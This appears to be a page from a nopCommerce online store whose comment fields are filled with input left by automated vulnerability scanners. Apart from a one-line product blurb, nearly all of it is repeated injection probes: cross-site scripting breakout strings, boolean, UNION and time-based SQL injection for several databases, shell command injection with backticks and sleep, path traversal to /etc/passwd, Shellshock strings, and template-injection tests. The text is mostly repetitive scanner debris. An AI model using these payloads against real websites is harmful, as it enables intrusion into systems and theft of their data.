nopCommerce includes everything you need to begin your e-commerce online store. We have thought of everything and it's all included!
This is a sample comment...
vega
asdf1209
-0000012345
-2147483648
0000012345
2147483647
4294967295
4294967296
0000023456
-2147483649
vega</textarea>-->">'>'"<vvv001602v841927>
vega" src=-->">'>'"<vvv001603v841927>
vega-->">'>'"<vvv001600v841927>
vega*/ -->">'>'"<vvv001606v841927>
vegajavascript:-->">'>'"<vvv001608v841927>
vegavbscript:-->">'>'"<vvv001609v841927>
vega" onMouseOver=-->">'>'"<vvv001610v841927>
vega src=-->">'>'"<vvv001604v841927>
vega' -->">'>'"<vvv001607v841927>
vega' onMouseOver=-->">'>'"<vvv001612v841927>
vega' style=-->">'>'"<vvv001613v841927>
vega" -->">'>'"<vvv001614v841927>
2147483648
http://www.google.com/humans.txt
htTp://www.google.com/humans.txt
hthttpttp://www.google.com/humans.txt
vega" style=-->">'>'"<vvv001611v841927>
bad1
bad2
e'
vega%dn%dn%dn%dn%dn%dn%dn%dn
vega%nd%nd%nd%nd%nd%nd%nd%nd
/../../../../../../../../../../../../etc/passwd
vega' -->">'>'"<vvv001615v841927>
vega`uname`
vega"`true`"
vega"`false`"
vega`true`
vega.htaccess.aspx-->">'>'"<vvv001601v841927>
vega'true'
vega"`uname`"
vega'uname'
vega\'\"
vega\\'\\"
e' or 1 eq 1 or 'a' = 'a
vega'"'"'"'"
vega'false'
vega'"
vega AND 1=1 --
; /bin/sleep 31 ;
vega' AND 1=1 --
vega' AND 1=2 --
vega`false`
vega AND 1=2 --
vega" AND 1=1 --
vega'
www.google.com/humans.txt
vega" AND 1=2 --
vega\'
vega" UNION SELECT 8, table_name, 'vega' FROM information_schema.taables WHERE taable_name like'%
vega''''""""
1 AND 1=1 --
1 AND 1=2 --
vega' UNION SELECT 8, table_name, 'vega' FROM information_schema.taables WHERE taable_name like'%
' AND 1=1 --
' AND 1=2 --
" AND 1=1 --
vega''
hthttp://tp://www.google.com/humans.txt
" AND 1=2 --
src=http://vega.invalid/;?
" src=http://vega.invalid/;?
vega-0
vega://invalid/;?
vega-0-9
vega' UNION SELECT 8, table_name, 'vega' FROM information_schema.tables WHERE table_name like'%
http://vega.invalid/;?
//vega.invalid/;?
vegabogusVega-Inject:bogus
vega-0-0
vega>'>"></vega><vega>
vega" UNION SELECT 8, table_name, 'vega' FROM information_schema.tables WHERE table_name like'%
vega - 0 - 0
vega>'>"><vega></vega>
vega 0 0 - -
vega -->">'>'"<vvv001605v841927>
() { :; }; printf 'Content-Type: text/json\r\n\r\n%s vulnerable %s' 'VEGA123' 'VEGA123'
e" or 1 eq 1 or "a" = "a
" ; /bin/sleep 31 ;
1 AND SLEEP(30) --
e' or true() or 'a'='a
' ; /bin/sleep 31 ;
/etc/passwd
vega-->">'>'"<vvv004176v841927>
vega" src=-->">'>'"<vvv004179v841927>
vega -->">'>'"<vvv004181v841927>
vega' -->">'>'"<vvv004183v841927>
vegajavascript:-->">'>'"<vvv004184v841927>
vegavbscript:-->">'>'"<vvv004185v841927>
vega" onMouseOver=-->">'>'"<vvv004186v841927>
vega' onMouseOver=-->">'>'"<vvv004188v841927>
vega' style=-->">'>'"<vvv004189v841927>
vega' -->">'>'"<vvv004191v841927>
vega" -->">'>'"<vvv004190v841927>
vega src=-->">'>'"<vvv004180v841927>
vega.htaccess.aspx-->">'>'"<vvv004177v841927>
vega" style=-->">'>'"<vvv004187v841927>
vega*/ -->">'>'"<vvv004182v841927>
vega</textarea>-->">'>'"<vvv004178v841927>
| /bin/sleep 31 ;
e" or true() or "a"="a
"| /bin/sleep 31 ;
file:/etc/passwd
'| /bin/sleep 31 ;
ping.exe -n 31 127.0.0.1
..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
() { _; } >_[$($())] { printf 'Content-Type: text/html\r\n\r\n%s vulnerable %s' 'VEGA123' 'VEGA123'; }
123456
${@var_dump(md5(674972155))};
/*1*/{{873867565+812141415}}
'-var_dump(md5(198785230))-'
${809945494+906856235}
${(958029913+974900853)?c}
${803433180+915187314}
#set($c=815774467+911172719)${c}$c
<%- 970441792+826044371 %>
123456expr 837161810 + 922314286
123456|expr 853869523 + 812526934
123456$(expr 970851008 + 964683467)
123456&set /A 972047917+882463269
expr 942761266 + 813894792
123456'and/**/extractvalue(1,concat(char(126),md5(1084449811)))and'
123456"and/**/extractvalue(1,concat(char(126),md5(1244594496)))and"
extractvalue(1,concat(char(126),md5(1020894686)))
123456'and(select'1'from/**/cast(md5(1005926915)as/**/int))>'0
123456/**/and/**/cast(md5('1255383013')as/**/int)>0
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1306955495')))
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1682831727')))>'0
123456鎈'"\(
123456'"\(
123456/**/and+2=2
123456/**/and+1=6
123456'and'm'='m
123456'and'k'='a
123456"and"t"="t
123456"and"h"="r
(select*from(select+sleep(0)union/**/select+1)a)
(select*from(select+sleep(2)union/**/select+1)a)
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456'and(select+1)>0waitfor/**/delay'0:0:2
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('n',0)
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('v',2)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('f',2)='f
${@var_dump(md5(117720939))};
'-var_dump(md5(185082073))-'
123456'and/**/extractvalue(1,concat(char(126),md5(1328399368)))and'
123456"and/**/extractvalue(1,concat(char(126),md5(1051484669)))and"
123456/**/and+0=7
123456expr 880331022 + 835620496
extractvalue(1,concat(char(126),md5(1006758312)))
123456'and'n'='n
123456|expr 836615791 + 975078556
/*1*/{{933019479+859240009}}
${810991868+961937796}
123456'and(select'1'from/**/cast(md5(1790512795)as/**/int))>'0
123456'and'd'='k
123456$(expr 843663578 + 845137171)
${960544298+878966261}
123456/**/and/**/cast(md5('1896430461')as/**/int)>0
123456&set /A 896807953+897060887
123456"and"l"="l
${(938560897+827272674)?c}
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1021681371')))
123456"and"d"="x
expr 865494778 + 997720937
#set($c=885193866+953879378)${c}$c
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1466362859')))>'0
<%- 916946878+937319911 %>
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('q',0)
123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('w',2)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('a',0)='a
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',2)='s
This is a sample comment...
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
asdf1209
asdf1209
asdf1209
vega
asdf1209
vega
asdf1209
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
-0000012345
-2147483648
0000012345
2147483647
vega
4294967295
4294967296
0000023456
-2147483649
vega</textarea>-->">'>'"<vvv001602v841927>
vega" src=-->">'>'"<vvv001603v841927>
vega-->">'>'"<vvv001600v841927>
vega*/ -->">'>'"<vvv001606v841927>
vegajavascript:-->">'>'"<vvv001608v841927>
vegavbscript:-->">'>'"<vvv001609v841927>
vega" onMouseOver=-->">'>'"<vvv001610v841927>
vega src=-->">'>'"<vvv001604v841927>
vega' -->">'>'"<vvv001607v841927>
vega' onMouseOver=-->">'>'"<vvv001612v841927>
vega' style=-->">'>'"<vvv001613v841927>
vega" -->">'>'"<vvv001614v841927>
2147483648
http://www.google.com/humans.txt
htTp://www.google.com/humans.txt
hthttpttp://www.google.com/humans.txt
vega" style=-->">'>'"<vvv001611v841927>
bad1
bad2
e'
vega%dn%dn%dn%dn%dn%dn%dn%dn
vega%nd%nd%nd%nd%nd%nd%nd%nd
/../../../../../../../../../../../../etc/passwd
vega' -->">'>'"<vvv001615v841927>
vega`uname`
vega"`true`"
vega"`false`"
vega`true`
vega.htaccess.aspx-->">'>'"<vvv001601v841927>
vega'true'
vega"`uname`"
vega'uname'
vega\'\"
vega\\'\\"
e' or 1 eq 1 or 'a' = 'a
vega'"'"'"'"
vega'false'
vega'"
vega AND 1=1 --
; /bin/sleep 31 ;
vega' AND 1=1 --
vega' AND 1=2 --
vega`false`
vega AND 1=2 --
vega" AND 1=1 --
vega'
www.google.com/humans.txt
vega" AND 1=2 --
vega\'
vega" UNION SELECT 8, table_name, 'vega' FROM information_schema.taables WHERE taable_name like'%
vega''''""""
1 AND 1=1 --
1 AND 1=2 --
vega' UNION SELECT 8, table_name, 'vega' FROM information_schema.taables WHERE taable_name like'%
' AND 1=1 --
' AND 1=2 --
" AND 1=1 --
vega''
hthttp://tp://www.google.com/humans.txt
" AND 1=2 --
src=http://vega.invalid/;?
" src=http://vega.invalid/;?
vega-0
vega://invalid/;?
vega-0-9
vega' UNION SELECT 8, table_name, 'vega' FROM information_schema.tables WHERE table_name like'%
http://vega.invalid/;?
//vega.invalid/;?
vega'"
vega\\'\\"
vegabogus
Vega-Inject:bogus
vega-0-0
vega>'>"></vega><vega>
vega" UNION SELECT 8, table_name, 'vega' FROM information_schema.tables WHERE table_name like'%
vega\'\"
vega - 0 - 0
vega>'>"><vega></vega>
vega 0 0 - -
vegabogus
Vega-Inject:bogus
vega
vega
-->">'>'"<vvv001605v841927>
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
() { :; }; printf 'Content-Type: text/json\r\n\r\n%s vulnerable %s' 'VEGA123' 'VEGA123'
vega
vega
e" or 1 eq 1 or "a" = "a
/../../../../../../../../../../../../etc/passwd
" ; /bin/sleep 31 ;
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
1 AND SLEEP(30) --
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
e' or true() or 'a'='a
vega
vega
' ; /bin/sleep 31 ;
/etc/passwd
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
-0000012345
-2147483648
vega
-2147483649
4294967296
4294967295
0000012345
2147483648
vega-->">'>'"<vvv004176v841927>
0000023456
vega" src=-->">'>'"<vvv004179v841927>
2147483647
vega
-->">'>'"<vvv004181v841927>
vega' -->">'>'"<vvv004183v841927>
vegajavascript:-->">'>'"<vvv004184v841927>
vegavbscript:-->">'>'"<vvv004185v841927>
vega" onMouseOver=-->">'>'"<vvv004186v841927>
vega' onMouseOver=-->">'>'"<vvv004188v841927>
vega' style=-->">'>'"<vvv004189v841927>
vega' -->">'>'"<vvv004191v841927>
vega" -->">'>'"<vvv004190v841927>
vega src=-->">'>'"<vvv004180v841927>
hthttpttp://www.google.com/humans.txt
htTp://www.google.com/humans.txt
e'
e' or 1 eq 1 or 'a' = 'a
vega.htaccess.aspx-->">'>'"<vvv004177v841927>
hthttp://tp://www.google.com/humans.txt
vega%nd%nd%nd%nd%nd%nd%nd%nd
vega`uname`
vega"`true`"
vega%dn%dn%dn%dn%dn%dn%dn%dn
vega'true'
vega'false'
http://www.google.com/humans.txt
www.google.com/humans.txt
vega"`uname`"
; /bin/sleep 31 ;
vega"`false`"
vegabogus
Vega-Inject:bogus
http://vega.invalid/;?
vega>'>"><vega></vega>
vegabogus
Vega-Inject:bogus
vega'uname'
vega>'>"></vega><vega>
vega://invalid/;?
vega`false`
//vega.invalid/;?
vega`true`
src=http://vega.invalid/;?
/../../../../../../../../../../../../etc/passwd
vega" style=-->">'>'"<vvv004187v841927>
vega*/ -->">'>'"<vvv004182v841927>
vega</textarea>-->">'>'"<vvv004178v841927>
" src=http://vega.invalid/;?
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
| /bin/sleep 31 ;
e" or true() or "a"="a
vega
/etc/passwd
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
() { :; }; printf 'Content-Type: text/json\r\n\r\n%s vulnerable %s' 'VEGA123' 'VEGA123'
e" or 1 eq 1 or "a" = "a
/../../../../../../../../../../../../etc/passwd
" ; /bin/sleep 31 ;
vega
vega
vega
vega
vega
vega
vega
"| /bin/sleep 31 ;
vega
file:/etc/passwd
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
' ; /bin/sleep 31 ;
e' or true() or 'a'='a
/etc/passwd
vega
vega
vega
'| /bin/sleep 31 ;
vega
vega
vega
file:/etc/passwd
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
vega
e" or true() or "a"="a
| /bin/sleep 31 ;
/etc/passwd
vega
vega
vega
vega
vega
ping.exe -n 31 127.0.0.1
..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
vega
vega
vega
vega
vega
vega
vega
vega
() { _; } >_[$($())] { printf 'Content-Type: text/html\r\n\r\n%s vulnerable %s' 'VEGA123' 'VEGA123'; }
vega
vega
vega
vega
vega
"| /bin/sleep 31 ;
file:/etc/passwd
vega
123456
123456
123456
${@var_dump(md5(674972155))};
123456
123456
123456
/*1*/{{873867565+812141415}}
'-var_dump(md5(198785230))-'
123456
123456
123456
123456
123456
${809945494+906856235}
123456
123456
123456
123456
123456
${(958029913+974900853)?c}
123456
123456
${803433180+915187314}
#set($c=815774467+911172719)${c}$c
123456
123456
<%- 970441792+826044371 %>
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
expr 837161810 + 922314286
123456
123456|expr 853869523 + 812526934
123456
123456
123456$(expr 970851008 + 964683467)
123456
123456
123456&set /A 972047917+882463269
123456
123456
expr 942761266 + 813894792
123456
123456
123456
123456
123456
123456'and/**/extractvalue(1,concat(char(126),md5(1084449811)))and'
123456
123456"and/**/extractvalue(1,concat(char(126),md5(1244594496)))and"
123456
123456
extractvalue(1,concat(char(126),md5(1020894686)))
123456
123456
123456'and(select'1'from/**/cast(md5(1005926915)as/**/int))>'0
123456
123456/**/and/**/cast(md5('1255383013')as/**/int)>0
123456
123456
123456
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1306955495')))
123456
123456
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1682831727')))>'0
123456
123456
123456鎈'"\(
123456
123456
123456'"\(
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456/**/and+2=2
123456
123456/**/and+1=6
123456
123456'and'm'='m
123456
123456'and'k'='a
123456
123456"and"t"="t
123456"and"h"="r
(select*from(select+sleep(0)union/**/select+1)a)
(select*from(select+sleep(2)union/**/select+1)a)
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456'and(select+1)>0waitfor/**/delay'0:0:2
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('n',0)
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('v',2)
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('f',2)='f
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
${@var_dump(md5(117720939))};
123456
123456
123456
123456
123456
'-var_dump(md5(185082073))-'
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456'and/**/extractvalue(1,concat(char(126),md5(1328399368)))and'
123456
123456/**/and+2=2
123456
123456
123456
123456"and/**/extractvalue(1,concat(char(126),md5(1051484669)))and"
123456/**/and+0=7
123456
123456
expr 880331022 + 835620496
123456
123456
extractvalue(1,concat(char(126),md5(1006758312)))
123456'and'n'='n
123456|expr 836615791 + 975078556
/*1*/{{933019479+859240009}}
123456
${810991868+961937796}
123456'and(select'1'from/**/cast(md5(1790512795)as/**/int))>'0
123456
123456'and'd'='k
123456$(expr 843663578 + 845137171)
${960544298+878966261}
123456
123456/**/and/**/cast(md5('1896430461')as/**/int)>0
123456
123456&set /A 896807953+897060887
123456"and"l"="l
${(938560897+827272674)?c}
123456
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1021681371')))
123456"and"d"="x
expr 865494778 + 997720937
#set($c=885193866+953879378)${c}$c
123456
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1466362859')))>'0
123456
<%- 916946878+937319911 %>
123456
123456
123456鎈'"\(
123456
123456
123456
123456
123456'"\(
123456
123456
123456
123456
123456
(select*from(select+sleep(0)union/**/select+1)a)
123456
123456
123456
(select*from(select+sleep(2)union/**/select+1)a)
123456
123456
123456
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
123456
123456
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='
123456
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
123456
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="
123456
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
123456
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/
123456
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0
123456
123456
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/
123456
123456'and(select+1)>0waitfor/**/delay'0:0:0
123456
123456'and(select+1)>0waitfor/**/delay'0:0:2
123456
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('q',0)
123456
123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('w',2)
123456
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('a',0)='a
123456
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',2)='s
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456
123456